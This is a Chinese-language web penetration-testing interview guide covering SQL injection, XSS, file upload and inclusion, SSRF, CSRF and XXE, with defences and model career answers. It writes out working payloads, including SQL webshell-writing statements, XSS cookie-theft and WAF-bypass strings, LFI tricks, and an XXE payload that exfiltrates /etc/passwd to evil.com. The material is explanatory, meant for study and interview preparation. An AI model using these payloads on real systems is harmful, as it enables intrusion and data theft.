安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
一、SQL注入全解
二、XSS與文件漏洞
三、服務端漏洞專題
四、職業經驗與能力評估
1、注入攻擊原理是什么?如何找注入點?如何判斷注入點? 2、注入分為幾類及提交方式是什么 3、注入攻擊一般所支持的類型有那些 4、mysql數據庫帳號和密碼存放在那個庫和表里面 5、如何尋找網站物理路徑 6、分別寫出mysql及mssql數據庫寫入webshell的方法 7、請說出mysql5.0以下與5.0以上的區別 8、sql注入對服務器文件讀寫操作需要那些條件 9、分別說出sqlmap -u -r -v -p —level —risk —tables —coiumns -T —tamper參數的含義 10、注入漏洞防范方法 11、xss攻擊原理及出現的原因 12、xss分為那幾類 13、xss的危害,可能存在的地方 14、xss漏洞測試方法 15、xss如何繞過安全防范 16、分別說出iis、apache、nginx解析漏洞原理 17、任意文件下載攻擊原理及測試方法 18、任意文件上傳漏洞分幾類,說出每類突破方法 19、分別文件包含漏洞攻擊原理及分類 20、如何快速挖包涵漏洞 21、包涵漏洞具體能做什么,怎么繞過你能說說嗎 22、ssrf漏洞攻擊原理、用途 23、說說你是如何挖掘ssrf漏洞 24、說說ssrf繞過及防范方法 25、csrf攻擊原理是什么及一般你用什么工具進行檢測 26、你是如何挖掘ssrf漏洞的及防范方法 27、說說xxe漏洞攻擊原理是什么,如何找xxe漏洞及攻擊方法 28、xxe攻擊在無回顯的時候你是如何突破的 29、你是如何防范xxe漏洞的 30、你挖洞影像最深的是什么? 31、你認為你的滲透水平在國內大概是什么水平,能給自己打多少分 32、說說你以前在你公司主要做什么安全工作?如每天、每月、每年做些什么安全工作 33、你在各大漏洞平臺挖過漏洞嗎,能說說嗎? 34、你寫過什么好的安全漏洞文章發布過嗎,是否可以說說?
一、SQL注入全解
1. 注入原理與檢測mermaid
graph LR A[用戶輸入] --> B[拼接入SQL語句] --> C[數據庫執行惡意指令] --> D[數據泄露/系統控制]
- 找注入點:表單參數、URL參數、HTTP頭(Cookie/User-Agent)
- 判斷方法:
- 單引號觸發報錯(
'
→ 500錯誤)- 邏輯測試(
id=1' and '1'='1
vsid=1' and '1'='2
)- 時間盲注(
id=1; select sleep(5)--
)2. 注入類型與提交方式
類型 提交方式 案例 聯合查詢注入 GET/POST參數 union select 1,@@version,3
報錯注入 Cookie頭 ' and updatexml(1,concat(0x7e,version()),1)--
布爾盲注 JSON Body admin' and substr(database(),1,1)='a'--
時間盲注 XML數據 if(ascii(substr(user(),1,1))=114,sleep(3),0)
3. 支持的數據類型
- 整型(
id=1
)、字符串(name='admin'
)、搜索型(%input%
)、JSON/XML4. MySQL憑據存儲位置
sql
-- MySQL 5.7+ SELECT user,authentication_string FROM mysql.user; -- MySQL <5.7 SELECT user,password FROM mysql.user;
5. 網站物理路徑獲取
- 報錯信息(PHP錯誤日志)
- 文件讀取漏洞(
/proc/self/environ
)- 數據庫函數(
@@datadir
)- 配置文件泄露(
WEB-INF/web.xml
)6. 數據庫寫Webshell方法
sql
/* MySQL(需FILE權限)*/ SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'; /* MSSQL(需db_owner權限)*/ EXEC sp_makewebtask 'C:\inetpub\shell.asp', '<?% execute(request("cmd")) %>';
7. MySQL 5.0關鍵區別
特性 5.0以下 5.0以上 系統表 無information_schema 內置元數據表 盲注效率 依賴暴力猜解 可直接查詢表結構 函數支持 受限 豐富(如group_concat) 8. 文件讀寫條件
- 數據庫配置:
- MySQL:
secure_file_priv=
空值- MSSQL:啟用
xp_cmdshell
- 權限:數據庫用戶需具備FILE權限(MySQL)或
db_owner
(MSSQL)- 路徑:絕對路徑且Web目錄可寫
9. SQLMap核心參數
bash
-u "url" # 目標URL -r request.txt # 從文件加載HTTP請求 -v 3 # 顯示完整payload(0-6級別) -p "id" # 指定測試參數 --level 2 # 檢測深度(1-5,影響Cookie/XFF檢測) --risk 3 # 風險等級(1-3,3會觸發OR注入) --tables # 列出所有表 --columns -T users # 列出指定表字段 --tamper "space2comment" # 繞過WAF的腳本
10. 注入防御方案
- 參數化查詢(PreparedStatement)
- 輸入過濾(正則匹配:
/[^a-z0-9]/i
)- 最小權限原則(禁用DB_FILE權限)
- WAF規則(過濾
union|select|sleep
)
二、XSS與文件漏洞
11. XSS原理與成因
mermaid
graph LR 用戶輸入 --> 未過濾插入頁面 --> 瀏覽器執行JS代碼 --> 劫持會話/釣魚
- 根本原因:未對
<>'"&
等字符轉義12. XSS分類
類型 觸發場景 案例 反射型 URL參數直接輸出 http://site?search=<script>alert(1)</script>
存儲型 數據庫存儲后渲染 留言板插入惡意腳本 DOM型 前端JS操作DOM document.write(location.hash)
13. XSS危害與常見位置
- 危害:Cookie竊取、鍵盤記錄、釣魚跳轉、內網探測
- 高發點:搜索框、評論區、用戶資料頁、HTTP頭輸出點
14. 測試方法
- 基礎探測:
<script>alert(1)</script>
- 事件觸發:
<img src=x onerror=alert(document.cookie)>
- 外部加載:
<script src=//evil.com/xss.js></script>
15. 繞過技巧
- Unicode編碼:
\u003cscript\u003e
- 標簽屬性分割:
<img """><script>alert(1)</script>
- 利用協議:
javascript:eval(alert(1))
- SVG向量:
<svg onload=alert(1)>
16. 服務器解析漏洞
服務器 漏洞原理 利用方式 IIS 6.0 分號截斷( *.asp;.jpg
)上傳惡意圖片馬 Apache 多后綴解析( file.php.jpg
)配置錯誤導致雙后綴 Nginx CVE-2013-4547( a.jpg\0.php
)空字節截斷 17. 任意文件下載
- 原理:未校驗文件路徑參數(如
download.jsp?file=../../etc/passwd
)- 測試:
- 遍歷路徑(
....//
編碼繞過)- 讀取系統文件(
/proc/self/cmdline
)18. 文件上傳突破方法
防御方式 繞過技巧 擴展名黑名單 .php5
.phtml
.htaccess
MIME類型檢測 修改Content-Type為 image/jpeg
文件頭檢查 添加GIF頭( GIF89a;
)內容過濾 短標簽( <?=
)或JS混淆19. 文件包含漏洞
- 原理:
include($_GET['file']);
未限制路徑- 分類:
- LFI(本地包含):包含系統文件
- RFI(遠程包含):加載遠程惡意腳本(需
allow_url_include=On
)20. 快速挖掘技巧
- 參數特征:
?page=about.php
- 日志包含:
file=/var/log/apache2/access.log
- PHP偽協議:
php://filter/convert.base64-encode/resource=index.php
21. 包含漏洞利用與繞過
- 能做什么:
- 讀取源碼(
php://filter
)- 執行代碼(包含圖片馬)
- 日志污染(User-Agent插入PHP代碼)
- 繞過:
- 路徑截斷(
/etc/passwd%00
)- 超長路徑(
./././[...]/file
)
三、服務端漏洞專題
22. SSRF原理與用途
mermaid
graph TB 攻擊者 --> 誘使服務器請求內網資源 --> 探測內網拓撲 --> 攻擊Redis/數據庫
- 用途:
- 內網端口掃描(
http://192.168.1.1:3306
)- 云元數據竊取(
169.254.169.254
)- 攻擊內網應用(Redis未授權訪問)
23. 漏洞挖掘方法
- 參數特征:
url=http://example.com
- 協議探測:
file:///etc/passwd
gopher://
- 重定向鏈:短鏈接→內網IP
24. SSRF繞過與防御
- 繞過:
- 域名重綁定(DNS TTL=0)
- IPv6地址(
[::ffff:127.0.0.1]
)- URL編碼(
0x7f000001
= 127.0.0.1)- 防御:
- 禁用非常用協議(file/gopher)
- 設置請求白名單
25. CSRF原理與工具
- 原理:誘導用戶點擊惡意鏈接觸發敏感操作(如修改密碼)
- 工具:
- Burp Suite → Generate CSRF PoC
- CSRFTester(自動化檢測)
26. CSRF防御
- Token驗證:表單添加隨機Token
- SameSite Cookie:設置
Strict
或Lax
- 二次驗證:關鍵操作需密碼確認
27. XXE漏洞攻防
- 原理:解析惡意XML實體(
<!ENTITY xxe SYSTEM "file:///etc/passwd">
)- 檢測:
- 修改Content-Type為
application/xml
- 插入測試實體(
&xxe;
)- 攻擊:
- 文件讀取(
SYSTEM "file://"
)- 內網探測(
http://192.168.1.1
)28. 無回顯XXE突破
xml
<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://evil.com/?data=%payload;'>">
- 通過DNS或HTTP請求外帶數據
29. XXE防御
- 禁用DTD(
libxml_disable_entity_loader(true);
)- 使用JSON替代XML
- 過濾
<!ENTITY
關鍵詞
四、職業經驗與能力評估
30. 印象最深漏洞案例
某銀行系統邏輯漏洞:轉賬接口未校驗雙方賬戶關系,通過遍歷參數實現任意賬戶互轉,漏洞評級嚴重(SRC TOP10)
31. 滲透水平自評
國內中高級水平(75/100)
- 優勢:熟練掌握漏洞鏈組合利用(如SSRF→Redis→RCE)
- 不足:二進制漏洞挖掘能力待提升
32. 日常工作內容
周期 工作重點 每日 漏洞掃描、日志審計、應急響應 每月 滲透測試報告、安全加固方案 每年 紅藍對抗演練、安全架構升級 33. 漏洞平臺經歷
- 提交平臺:補天、HackerOne、企業SRC
- 成果:累計提交高危漏洞32個(含3個嚴重級)
34. 技術文章輸出
《基于流量特征的WAF繞過實戰》
- 發布平臺:FreeBuf、安全客
- 核心內容:
- 分塊傳輸繞過
- 注釋符混淆SQL語句
- HTTP參數污染技巧